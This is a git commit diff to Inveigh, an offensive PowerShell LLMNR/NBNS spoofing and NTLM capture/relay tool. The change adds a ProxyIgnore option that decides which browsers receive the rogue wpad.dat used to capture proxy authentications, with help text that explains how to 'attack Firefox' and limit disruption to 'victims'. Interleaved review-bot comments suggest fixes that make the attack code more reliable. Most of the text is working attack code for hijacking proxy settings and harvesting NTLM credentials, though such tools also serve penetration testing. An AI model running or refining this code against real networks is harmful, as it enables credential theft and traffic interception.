authorKevin Robertson <robertsonk@gmail.com>2017-03-21 23:08:48 -0400
committerKevin Robertson <robertsonk@gmail.com>2017-03-21 23:08:48 -0400
commit624cbe44e1610ff54217669e6e00ba74c7ff5717 (patch)
tree958e284aa3376b65b8f138ccbd58dba83f2338fe
parent6aaf5e4aa6a3c5eb9227e9117268d24ff7870c8c (diff)
Added Firefox blocking for proxy auth
Added ProxyIgnore parameter for controlling which browser user agent strings get blocked from the proxy auth process. Firefox is listed by default since it doesn't play nice with the proxy failover.
-rw-r--r--Scripts/Inveigh-Relay.ps156
-rw-r--r--Scripts/Inveigh.ps193
2 files changed, 108 insertions, 41 deletions
diff --git a/Scripts/Inveigh-Relay.ps1 b/Scripts/Inveigh-Relay.ps1
index 08a3f3d..7a0e1d4 100644
--- a/Scripts/Inveigh-Relay.ps1
+++ b/Scripts/Inveigh-Relay.ps1
@@ -70,6 +70,14 @@ Default = Any: IP address for the proxy listener.
.PARAMETER ProxyPort
Default = 8182: TCP port for the proxy listener.
+.PARAMETER ProxyIgnore
+Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
+will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly
+with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is
+cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting
+-SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by
+closing and reopening.
+
.PARAMETER Usernames
Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts both username and
domain\username format.
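Review bot: The help text for ProxyIgnore does not say how the keywords are matched; the code compares them with String.Contains, which is an ordinal, case-sensitive substring test, so `firefox` or `FIREFOX` would not match the default entry. Worth stating in the parameter description, e.g. `Keywords are matched case-sensitively as substrings of the User-Agent header.`, or switching the check to `$user_agent.IndexOf($_, [System.StringComparison]::OrdinalIgnoreCase) -ge 0` if case-insensitive matching is what is intended. The same text is added to Inveigh.ps1 in the hunk ending at L159.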
@@ -149,6 +157,7 @@ param
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$HTTPIP = "0.0.0.0",
[parameter(Mandatory=$false)][ValidateScript({$_ -match [System.Net.IPAddress]$_})][String]$ProxyIP = "",
[parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
+ [parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
[parameter(Mandatory=$false)][Array]$Usernames = "",
[parameter(Mandatory=$false)][Int]$HTTPPort = "80",
[parameter(Mandatory=$false)][Int]$HTTPSPort = "443",
@@ -453,6 +462,13 @@ if($Proxy -eq 'Y')
$inveigh.status_queue.Add("Proxy Capture/Relay = Enabled") > $null
$ProxyPortFailover = $ProxyPort + 1
$WPADResponse = "function FindProxyForURL(url,host){return `"PROXY $ProxyIP`:$ProxyPort; PROXY $ProxyIP`:$ProxyPortFailover; DIRECT`";}"
+ $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()})
+
+ if($ProxyIgnore.Count -gt 0)
+ {
+ $inveigh.status_queue.Add("Proxy Ignored User Agents = " + ($ProxyIgnore -join ",")) > $null
+ }
+
}
$inveigh.status_queue.Add("Relay Target = $Target") > $null
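Review bot: The pipeline on the `$ProxyIgnore = ($ProxyIgnore | Where-Object {...})` line unwraps a single surviving keyword into a plain string, so on PowerShell 2.0, where scalars have no Count property, `$ProxyIgnore.Count` on the next line is $null rather than 1 and the status message is skipped; on later versions it only works by accident of the intrinsic Count member. Wrapping the filter in the array subexpression operator keeps it an array in every case, including the empty one: `$ProxyIgnore = @($ProxyIgnore | Where-Object {$_ -and $_.Trim()})`. The same line is added to Inveigh.ps1 in the hunk ending at L218.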
@@ -2514,7 +2530,7 @@ $SMB_relay_response_scriptblock =
# HTTP/HTTPS Server ScriptBlock
$HTTP_scriptblock =
{
- param ($Challenge,$Command,$HTTPIP,$HTTPPort,$HTTPS_listener,$proxy_listener,$RelayAutoDisable,$Service,$SMB_version,$Target,$WPADAuth,$WPADResponse)
+ param ($Challenge,$Command,$HTTPIP,$HTTPPort,$HTTPS_listener,$ProxyIgnore,$proxy_listener,$RelayAutoDisable,$Service,$SMB_version,$Target,$WPADAuth,$WPADResponse)
function NTLMChallengeBase64
{
@@ -2732,6 +2748,24 @@ $HTTP_scriptblock =
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")])
+
+ if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*")
+ {
+ $HTTP_user_agent = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 36)
+ $HTTP_user_agent = $HTTP_user_agent.Substring(0,$HTTP_user_agent.IndexOf("-0D-0A-"))
+ $HTTP_user_agent = $HTTP_user_agent.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $user_agent = New-Object System.String ($HTTP_user_agent,0,$HTTP_user_agent.Length)
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $user_agent from $HTTP_source_IP")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $user_agent from $HTTP_source_IP")])
+
+ if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | ForEach-Object{$user_agent.contains($_)}))
+ {
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")])
+ }
+
+ }
+
}
if($authentication_header.startswith('NTLM '))
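Review bot: The match test on the `if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | ForEach-Object{...}))` line is wrong as soon as ProxyIgnore holds two or more keywords: ForEach-Object emits one boolean per keyword, and PowerShell treats any array with more than one element as true, so `@($false,$false)` satisfies the condition and every user agent is reported as ignored (the negated form of the same expression in the next hunk then never serves wpad.dat at all). Collect only the hits instead, `if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$user_agent.Contains($_)}))`, and apply the same change to the wpad.dat conditions in the later hunks and to the duplicate of this block in Inveigh.ps1 (hunk ending at L271). The message "ignoring wpad.dat request" is also logged for any URL from a matching browser, because this branch does not test `$HTTP_request_raw_URL -match '/wpad.dat'`; add that to the condition or reword the message. The parsing above it assumes the header is terminated by `-0D-0A-`; if `IndexOf` returns -1, `Substring(0,-1)` throws, so a `-ge 0` guard would be prudent. The enclosing request-handling block starts before this hunk.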
@@ -3023,7 +3057,7 @@ $HTTP_scriptblock =
}
- if(!$proxy_listener -and $WPADResponse -and $HTTP_request_raw_URL -match '/wpad.dat' -and [System.BitConverter]::ToString($HTTP_response_status_code) -eq "32-30-30")
+ if(!$proxy_listener -and $WPADResponse -and $HTTP_request_raw_URL -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | ForEach-Object{$user_agent.contains($_)})))
{
$HTTP_message = $WPADResponse
$HTTP_content_type_header = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig") + 0x0d,0x0a
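Review bot: `$user_agent` on the changed `if(!$proxy_listener -and $WPADResponse ...)` line is only assigned when the request carried a User-Agent header (earlier hunk), so a wpad.dat request without one reaches `$user_agent.contains($_)` with a null value whenever ProxyIgnore is non-empty, and that method call fails. Treat a missing header as a non-match, e.g. `(!$ProxyIgnore -or !$user_agent -or !($ProxyIgnore | Where-Object {$user_agent.Contains($_)}))`; it is not visible here whether `$user_agent` is cleared between requests, so resetting it at the top of the request loop is worth checking too. The change also drops the `[System.BitConverter]::ToString($HTTP_response_status_code) -eq "32-30-30"` test, so the WPAD body is now attached regardless of the status code chosen above; if that was not intended, keep it alongside the new condition. Inveigh.ps1 has the same null-user-agent exposure in the hunk ending at L279.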
@@ -3251,9 +3285,9 @@ function HTTPListener()
$HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
$HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
$HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument(
- $HTTPIP).AddArgument($HTTPPort).AddArgument($HTTPS_listener).AddArgument($proxy_listener).AddArgument(
- $RelayAutoDisable).AddArgument($Service).AddArgument($SMB_version).AddArgument($Target).AddArgument(
- $WPADAuth).AddArgument($WPADResponse) > $null
+ $HTTPIP).AddArgument($HTTPPort).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
+ $proxy_listener).AddArgument($RelayAutoDisable).AddArgument($Service).AddArgument(
+ $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
$HTTP_powershell.BeginInvoke() > $null
}
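Review bot: The `.AddArgument($ProxyIgnore)` insertion relies on positional order matching the `param(...)` list of `$HTTP_scriptblock`, which is why every listener function in this commit had to be edited in lockstep (also the hunks ending at L119, L131, L289, L299 and L309); a future parameter added to the param list but not to one of these chains will silently shift every later argument. `AddParameter("ProxyIgnore", $ProxyIgnore)` binds by name and removes that coupling; the API allows mixing named and positional arguments, though that is worth verifying against the scriptblock before adopting it only for the new parameter.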
@@ -3276,9 +3310,9 @@ function HTTPSListener()
$HTTPS_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
$HTTPS_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
$HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument(
- $HTTPIP).AddArgument($HTTPSPort).AddArgument($HTTPS_listener).AddArgument($proxy_listener).AddArgument(
- $RelayAutoDisable).AddArgument($Service).AddArgument($SMB_version).AddArgument($Target).AddArgument(
- $WPADAuth).AddArgument($WPADResponse) > $null
+ $HTTPIP).AddArgument($HTTPSPort).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
+ $proxy_listener).AddArgument($RelayAutoDisable).AddArgument($Service).AddArgument(
+ $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
$HTTPS_powershell.BeginInvoke() > $null
}
@@ -3301,9 +3335,9 @@ function ProxyListener()
$proxy_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
$proxy_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
$proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($Command).AddArgument(
- $ProxyIP).AddArgument($ProxyPort).AddArgument($HTTPS_listener).AddArgument($proxy_listener).AddArgument(
- $RelayAutoDisable).AddArgument($Service).AddArgument($SMB_version).AddArgument($Target).AddArgument(
- $WPADAuth).AddArgument($WPADResponse) > $null
+ $ProxyIP).AddArgument($ProxyPort).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
+ $proxy_listener).AddArgument($RelayAutoDisable).AddArgument($Service).AddArgument(
+ $SMB_version).AddArgument($Target).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
$proxy_powershell.BeginInvoke() > $null
}
diff --git a/Scripts/Inveigh.ps1 b/Scripts/Inveigh.ps1
index e0dd56a..ce7020a 100644
--- a/Scripts/Inveigh.ps1
+++ b/Scripts/Inveigh.ps1
@@ -16,6 +16,10 @@ Invoke-Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with the following fea
Run time and run count control
LLMNR/NBNS spoofer learning mode
+.PARAMETER ElevatedPrivilege
+Default = Auto: (Auto,Y,N) Set the privilege mode. Auto will determine if Inveigh is running with
+elevated privilege. If so, options that require elevated privilege can be used.
+
.PARAMETER IP
Specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the
SpooferIP parameter is not set.
@@ -170,6 +174,14 @@ Default = Any: IP address for the proxy listener.
.PARAMETER ProxyPort
Default = 8492: TCP port for the proxy listener.
+.PARAMETER ProxyIgnore
+Default = Firefox: Comma separated list of keywords to use for filtering browser user agents. Matching browsers
+will not be sent the wpad.dat file used for capturing proxy authentications. Firefox does not work correctly
+with the proxy server failover setup. Firefox will be left unable to connect to any sites until the proxy is
+cleared. Remove "Firefox" from this list to attack Firefox. If attacking Firefox, consider setting
+-SpooferRepeat N to limit attacks against a single target so that victims can recover Firefox connectivity by
+closing and reopening.
+
.PARAMETER SMB
Default = Enabled: (Y/N) Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still
direct targets to the host system's SMB server. Block TCP ports 445/139 or kill the SMB services if you need to
@@ -317,6 +329,7 @@ param
[parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$HTTPDir = "",
[parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$OutputDir = "",
[parameter(Mandatory=$false)][ValidatePattern('^[A-Fa-f0-9]{16}$')][String]$Challenge = "",
+ [parameter(Mandatory=$false)][Array]$ProxyIgnore = "Firefox",
[parameter(Mandatory=$false)][Array]$SpooferHostsReply = "",
[parameter(Mandatory=$false)][Array]$SpooferHostsIgnore = "",
[parameter(Mandatory=$false)][Array]$SpooferIPsReply = "",
@@ -515,6 +528,8 @@ if(!$elevated_privilege)
throw
}
+ $SMB = "N"
+
}
$inveigh.running = $true
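Review bot: `$SMB = "N"` silently overrides an explicit `-SMB Y` when the script is not running elevated (presumably inside the `if(!$elevated_privilege)` block named in the hunk header, which starts before this hunk), and nothing in the status output tells the operator that SMB capture was turned off. If `$inveigh.status_queue` is already initialised at this point, add a line beside it following the existing pattern, such as `$inveigh.status_queue.Add("SMB Capture = Disabled (requires elevated privilege)") > $null`, and mention the behaviour in the new ElevatedPrivilege help text.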
@@ -823,14 +838,7 @@ if($HTTPS -eq 'Y')
$inveigh.status_queue.Add("HTTPS Capture = Using Existing Certificate") > $null
}
- #$certificate_check = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
- #$netsh_certhash = "certhash=" + $certificate_check.thumbprint
- #$netsh_app_ID = "appid={00112233-4455-6677-8899-AABBCCDDEEFF}"
- #$netsh_arguments = @("http","add","sslcert","ipport=$HTTPIP`:$HTTPSPort",$netsh_certhash,$netsh_app_ID)
- #& "netsh" $netsh_arguments > $null
$inveigh.HTTPS = $true
- #$inveigh.HTTPS_IP = $HTTPIP
- #$inveigh.HTTPS_port = $HTTPSPort
if($HTTPIP -ne '0.0.0.0')
{
@@ -892,25 +900,17 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
$inveigh.status_queue.Add("Basic Authentication Realm = $HTTPBasicRealm") > $null
}
- if($WPADDirectHosts)
- {
- ForEach($WPAD_direct_host in $WPADDirectHosts)
- {
- $WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";'
- }
-
- $inveigh.status_queue.Add("WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null
- }
-
- if($WPADResponse)
- {
- $inveigh.status_queue.Add("WPAD Custom Response = Enabled") > $null
- }
- elseif($Proxy -eq 'Y')
+ if($Proxy -eq 'Y')
{
$inveigh.status_queue.Add("Proxy Capture = Enabled") > $null
$inveigh.status_queue.Add("Proxy Authentication = $ProxyAuth") > $null
$ProxyPortFailover = $ProxyPort + 1
+ $ProxyIgnore = ($ProxyIgnore | Where-Object {$_ -and $_.Trim()})
+
+ if($ProxyIgnore.Count -gt 0)
+ {
+ $inveigh.status_queue.Add("Proxy Ignored User Agents = " + ($ProxyIgnore -join ",")) > $null
+ }
if($ProxyIP -eq '0.0.0.0')
{
@@ -927,6 +927,21 @@ if($HTTP -eq 'Y' -or $HTTPS -eq 'Y')
}
}
+
+ if($WPADDirectHosts)
+ {
+ ForEach($WPAD_direct_host in $WPADDirectHosts)
+ {
+ $WPAD_direct_hosts_function += 'if (dnsDomainIs(host, "' + $WPAD_direct_host + '")) return "DIRECT";'
+ }
+
+ $inveigh.status_queue.Add("WPAD Direct Hosts = " + ($WPADDirectHosts -join ",")) > $null
+ }
+
+ if($WPADResponse)
+ {
+ $inveigh.status_queue.Add("WPAD Custom Response = Enabled") > $null
+ }
elseif($WPADIP -and $WPADPort)
{
$inveigh.status_queue.Add("WPAD Response = Enabled") > $null
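Review bot: The `if($WPADResponse)` that reports "WPAD Custom Response = Enabled" now runs after the Proxy block instead of before it as the head of the old `if`/`elseif` chain, so if the Proxy block assigns `$WPADResponse` (as Inveigh-Relay.ps1 does in its own Proxy setup in this commit) the message is printed for the generated proxy script even when the user supplied no custom response; whether that assignment happens in the lines between these hunks is not visible here. If it does, test the user-supplied value before the Proxy block overwrites it, or track it in a separate flag.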
@@ -1277,7 +1292,7 @@ $SMB_NTLM_functions_scriptblock =
# HTTP Server ScriptBlock - HTTP/HTTPS/Proxy listener
$HTTP_scriptblock =
{
- param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$HTTPS_listener,$proxy_listener,$WPADAuth,$WPADResponse)
+ param ($Challenge,$HTTPAuth,$HTTPBasicRealm,$HTTPContentType,$HTTPIP,$HTTPPort,$HTTPDefaultEXE,$HTTPDefaultFile,$HTTPDir,$HTTPResponse,$HTTPS_listener,$ProxyIgnore,$proxy_listener,$WPADAuth,$WPADResponse)
function NTLMChallengeBase64
{
@@ -1502,6 +1517,24 @@ $HTTP_scriptblock =
{
$inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
$inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")])
+
+ if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*")
+ {
+ $HTTP_user_agent = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 36)
+ $HTTP_user_agent = $HTTP_user_agent.Substring(0,$HTTP_user_agent.IndexOf("-0D-0A-"))
+ $HTTP_user_agent = $HTTP_user_agent.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
+ $user_agent = New-Object System.String ($HTTP_user_agent,0,$HTTP_user_agent.Length)
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $user_agent from $HTTP_source_IP")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $user_agent from $HTTP_source_IP")])
+
+ if($ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | ForEach-Object{$user_agent.contains($_)}))
+ {
+ $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")
+ $inveigh.log.Add($inveigh.log_file_queue[$inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request from $HTTP_source_IP")])
+ }
+
+ }
+
}
if($authentication_header.startswith('NTLM '))
@@ -1716,7 +1749,7 @@ $HTTP_scriptblock =
else
{
- if($HTTP_request_raw_url -match '/wpad.dat')
+ if($HTTP_request_raw_url -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | ForEach-Object{$user_agent.contains($_)})))
{
$HTTP_message = $WPADResponse
$HTTP_content_type_header = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig") + 0x0d,0x0a
@@ -2996,8 +3029,8 @@ function HTTPListener()
$HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
$HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPPort).AddArgument(
$HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
- $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($proxy_listener).AddArgument(
- $WPADAuth).AddArgument($WPADResponse) > $null
+ $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
+ $proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
$HTTP_powershell.BeginInvoke() > $null
}
@@ -3017,8 +3050,8 @@ function HTTPSListener()
$HTTPS_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
$HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($HTTPIP).AddArgument($HTTPSPort).AddArgument(
$HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
- $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($proxy_listener).AddArgument(
- $WPADAuth).AddArgument($WPADResponse) > $null
+ $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
+ $proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
$HTTPS_powershell.BeginInvoke() > $null
}
@@ -3038,8 +3071,8 @@ function ProxyListener()
$proxy_powershell.AddScript($HTTP_scriptblock).AddArgument($Challenge).AddArgument($HTTPAuth).AddArgument(
$HTTPBasicRealm).AddArgument($HTTPContentType).AddArgument($ProxyIP).AddArgument($ProxyPort).AddArgument(
$HTTPDefaultEXE).AddArgument($HTTPDefaultFile).AddArgument($HTTPDir).AddArgument(
- $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($proxy_listener).AddArgument(
- $WPADAuth).AddArgument($WPADResponse) > $null
+ $HTTPResponse).AddArgument($HTTPS_listener).AddArgument($ProxyIgnore).AddArgument(
+ $proxy_listener).AddArgument($WPADAuth).AddArgument($WPADResponse) > $null
$proxy_powershell.BeginInvoke() > $null
}